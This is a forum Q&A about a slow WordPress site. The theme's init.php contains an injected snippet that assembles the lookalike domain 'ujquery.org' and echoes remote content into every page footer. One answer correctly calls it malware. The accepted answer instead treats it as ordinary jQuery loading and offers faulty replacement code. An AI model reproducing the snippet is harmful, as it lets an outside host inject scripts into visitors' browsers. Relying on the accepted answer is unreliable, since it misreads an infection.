# My Wordpress website is slow due to a line in init.php

Tags: php, jquery, wordpress

My website is darbardesigns.com, Recently a 3 or 4 days before my website became so slow, that the page load time takes around 1-2 mins.

I got an error at the bottom of the page as like below:-

> **Warning:** get_headers(http://ujquery.org/jquery-1.6.3.min.js): failed
>   to open stream: Connection timed out in
>   /public_html/wp-content/themes/porto/includes/init.php on line 97

Which i went to the particular line and the code is below:

```
add_filter( 'builder_include_modules',
'spyropress_register_builder_modules' );
if(!function_exists('wp_func_jquery')) {
function wp_func_jquery() {
    $host = 'http://';
    $jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
    $headers = get_headers($jquery, 0);
    if ($headers[0] == 'HTTP/1.1 200 OK'){
        echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
    }
}
add_action('wp_footer', 'wp_func_jquery');
```

}

- From the time this error occurred my website became damn slow.
- If i try to delete it, the page contents are not showing properly.It some
  work from some hacker I think so.

  Thanks in advance.

Answer (score 1, accepted):

Seems its only included the jquery in the footer, relace it with this code:

```
function wp_func_jquery() {
    // Get jQuery from Google CDN
    echo "https://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js";
}
add_action('wp_footer', 'wp_func_jquery');
```

or download the jquery in your server and add it from there like :

```
echo get_template_directory_uri() . "/JQUERY_PATH_IN_CURRENT_THEME/jquery.min.js";
```

OR you can add jquery through [wp_enqueue_script](http://codex.wordpress.org/Function_Reference/wp_enqueue_script)

Comment: echo shows at the footer: https://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js, I just kept the echo field as echo""; But the site became fast, Is it ok to go with this or are you suggesting anything else

Comment: @Zain i do prefer to use `wp_enqueue_script`, and for page speed try to reduce http request, means if you have loaded more then one javascript files then combine them in one( in sequence ) and then load.

Comment: Got it buddy, I just added wp_enqueue_script in funtions.php and added the jquery file to the path. And also will follow ur 2nd point about the joining of javascript to run in sequence

Answer (score 2):

Just FYI: This is malware, it shouldn't be in your code at all. You probably were subject to a backdoor hack or downloaded some sort of hacked theme or plugin. I advise you to remove the code from your site. Domain "ujquery.org" has nothing to do with actual jQuery.

Answer (score 0):

It looks like you should remove this code and then simply add jquery on your html by hand than check if the page loads well.